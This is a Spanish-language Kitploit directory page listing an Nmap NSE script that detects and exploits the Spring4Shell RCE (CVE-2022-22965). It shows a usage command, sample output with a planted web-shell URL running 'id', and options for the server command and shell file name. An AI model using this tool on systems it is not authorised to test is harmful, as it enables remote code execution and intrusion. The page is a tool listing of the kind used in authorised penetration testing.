Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/gpiechnik2/nmap-spring4shell
ReconocimientoEscáneres de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de Penetración
GitHubgpiechnik2/nmap-spring4shell

nmap-spring4shell

Script NSE de Nmap para detectar y explotar la vulnerabilidad RCE Spring4Shell (CVE-2022-22965) en servicios HTTP con inyección de payload configurable y ejecución de comandos.

Ver Repositorio
841hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Nmap-spring4shell

Log4shell-nmap es un script NSE para detectar vulnerabilidades de RCE Spring4Shell (CVE-2022-22965) en servicios HTTP. El script inyecta el payload correcto en la aplicación y luego ejecuta el siguiente comando en el endpoint especificado.

Vulnerabilidad

Ver aquí.

Uso

root@kitploit:~
┌──(kali㉿kali)-[~/nmap-spring4shell]
└─$ nmap 127.0.0.1 --script=./spring4shell.nse
(...)
PORT     STATE SERVICE    REASON  VERSION
8080/tcp open  http-proxy syn-ack
| spring4shell: 
|   VULNERABLE:
|   Spring4Shell - Spring Framework RCE via Data Binding on JDK 9+
|     State: VULNERABLE
|     IDs:  CVE:CVE-2022-22965
|     Check results:
|       127.0.0.1:8080/shell.jsp?pwd=j&cmd=id
|     Extra information:
|       TESTED URL: 127.0.0.1:8080
|       COMMAND: id
|       ASSERTION: uid
|     References:
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965

Argumentos

Podemos usar varias variables en el script. Estas son las siguientes:

  • endpoint - url relativa. En https://bugspace.pl/search/videos será /search/videos,
  • command - comando a ejecutar en el servidor. El comando por defecto es id,
  • assertion - la cadena verificada dentro de la respuesta del servidor. La aserción por defecto es uid,
  • filename - nombre del archivo en el servidor. Para más información ver aquí. El nombre por defecto es shell.

Datos adicionales

Probado en la aplicación de aquí y aquí

Licencia

Igual que Nmap. Ver https://nmap.org/book/man-legal.html

Descargar herramienta